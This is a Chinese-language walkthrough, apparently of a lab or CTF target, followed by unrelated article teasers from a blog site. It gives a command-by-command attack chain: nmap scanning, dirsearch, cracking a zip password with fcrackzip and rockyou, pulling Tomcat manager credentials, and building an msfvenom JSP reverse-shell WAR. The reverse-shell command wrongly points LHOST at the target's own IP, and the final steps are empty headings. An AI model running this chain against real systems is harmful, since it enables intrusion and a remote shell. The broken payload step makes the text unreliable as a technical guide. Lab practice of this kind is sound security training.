1.用kali作为攻击机

查找靶机的ip

kaili和靶机都设为NAT模式

nmap -sn 192.168.51.0/24

2.扫描端口

nmap -p- 192.168.51.130

3.访问端口

80

8080

3.扫目录

dirsearch -u http://192.168.51.130

没用

dirsearch -u http://192.168.51.130:8080

发现了两个可能有用的信息,分别访问

readme.txt

backup.zip

4.解压backup.zip

需要密码,破解一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

密码是@administrator_hi5

cat tomcat-users.xml

username="manager" password="melehifokivai"

username="admin" password="melehifokivai"

5.登录

发现可以部署war文件

6.制作war文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.51.130" LPORT=8888 -f war > jsp_java.war

7.访问

8.开启监听

# linux # 运维 # 服务器
Logo
2048 AI社区

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐

cover

GEO的关键要素

avatar 2048 AI社区

AI应用架构师:智能家居生态系统AI应用的技术领航者

智能家居不是“智能设备的堆砌”,而是一个需要“统一大脑”的有机生态。当你说“我有点冷”时,空调自动调温、加湿器启动、窗帘缓缓合上——这背后是AI应用架构师设计的“神经中枢”在运转:它让分散的设备学会“协同”,让数据从“孤岛”变成“资产”,让服务从“被动响应”升级为“主动预判”。本文将以“AI应用架构师”的视角,拆解智能家居生态的技术底层逻辑:从“设备如何说话”到“数据如何流动”,从“隐私如何保护”

avatar 2048 AI社区

某中心AI超智能单元任命首席科学家

某科技巨头首席执行官于周五宣布,前OpenAI研究员Shengjia Zhao将担任新成立的AI部门——Meta超智能实验室(MSL)的首席科学家。Zhao曾参与OpenAI多项重大突破性项目,包括ChatGPT、GPT-4以及该公司首款AI推理模型o1。“Shengjia共同创立了这个新实验室,并从第一天起就是我们的首席科学家。随着招聘工作顺利推进和团队逐渐成型,现正式确认其领导角色,”该首席执

avatar 2048 AI社区